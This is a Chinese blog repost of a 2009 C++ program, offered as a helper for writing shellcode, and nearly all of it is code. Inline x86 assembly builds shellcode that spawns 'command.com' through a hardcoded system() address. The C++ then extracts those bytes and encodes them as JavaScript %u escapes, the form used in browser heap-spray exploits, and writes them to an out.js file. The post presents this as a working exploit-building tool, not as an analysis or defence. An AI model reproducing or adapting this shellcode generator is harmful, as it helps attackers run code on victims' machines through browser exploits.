shellcode提取和js编码转换，对写shellcode很有帮助

来源：互联网发布：淘宝运营数据分析表格编辑：程序博客网时间：2024/05/17 10:43

周一上午无聊，手头有点公事，还是放在后边再说吧，哈哈。先来点有用的东东。

下面是具体代码，相信搞过shellcode的朋友一定很清楚了。

write shellcode to js

author:Phoenix @ 2009.7.13

void DecimalToHexChar(unsigned char a, char hexChar[])
{
int b = a/16;
if((0<=b) && (b<=9))
  hexChar[0] = '0'+b;
else if((0xA<=b) && (b<=0xF))
  hexChar[0] = 'A'+b-10;
else
  hexChar[0] = 'x'; //特殊字符,说明传入的字符a数据超出了0-255的范围

int c = a%16;
if((0<=c) && (c<=9))
  hexChar[1] = '0'+c;
else if((0xA<=c) && (c<=0xF))
  hexChar[1] = 'A'+c-10;
else
  hexChar[1] = 'x';
};

char* GenJavaScriptShellcode(char* buf/*shellcode缓冲区*/, int len)
{
//用0补齐
if(0 != len%2)
{
buf[len]=0;
len++;
}

//计算目标缓冲区长度
int dstLen = len/2*6;//%uaabb
char* pDstBuf = new char[dstLen+1]; //多分配一个'/0'
pDstBuf[dstLen] = 0;
for(int i = 0, j = 0; i < len; j+=6, i+=2)
{
  pDstBuf[j] = '%';
  pDstBuf[j+1] = 'u';
  //注意:javascript表示是内存的倒序
  DecimalToHexChar(buf[i], pDstBuf+j+4);
  DecimalToHexChar(buf[i+1], pDstBuf+j+2);
}
// output
return pDstBuf;
}

int _tmain(int argc, _TCHAR* argv[])
{
// HMODULE h = LoadLibrary("msvcrt.dll");
// FARPROC paddr = GetProcAddress(h, "system");
DWORD beginAddr=0, codeLen=0;
__asm
{
  //get
  call _local1
_local1:
  pop esi
  add esi, 0Bh ;去掉前面11个
  lea eax, beginAddr
  mov [eax], esi
  jmp _local3
_local2:
  mov esp,ebp;
  push ebp;
  mov ebp,esp ;                      把当前esp赋给ebp
  xor edi,edi ;
  push edi ;压入0，esp－4,;   作用是构造字符串的结尾/0字符。
  sub esp,08h ;加上上面，一共有12个字节,;用来放"command.com"。
  mov byte ptr [ebp-0ch],63h ; c
  mov byte ptr [ebp-0bh],6fh ; o
  mov byte ptr [ebp-0ah],6dh ; m
  mov byte ptr [ebp-09h],6Dh ; m
  mov byte ptr [ebp-08h],61h ; a
  mov byte ptr [ebp-07h],6eh ; n
  mov byte ptr [ebp-06h],64h ; d
  mov byte ptr [ebp-05h],2Eh ; .
  mov byte ptr [ebp-04h],63h ; c
  mov byte ptr [ebp-03h],6fh ; o
  mov byte ptr [ebp-02h],6dh ; m一个一个生成串"command.com".
  lea eax,[ebp-0ch] ;
  push eax ;                            command.com串地址作为参数入栈
  mov eax, 0x77bf93c7;
  call eax ;                              call system函数的地址
  add esp, 10h
  //get
_local3:
  mov ecx, offset _local3
  mov edx, offset _local2
  sub ecx, edx
  lea ebx, codeLen
  mov [ebx], ecx
}

//gen
char* codeBuf = new char[codeLen+1];
memcpy(codeBuf, (char*)beginAddr, codeLen);
char* jsOut = GenJavaScriptShellcode(codeBuf, codeLen);
FILE* fp = fopen("c://out.js", "w");
fputs(jsOut, fp);
fclose(fp);
delete[] codeBuf;
delete[] jsOut;
return 0;
}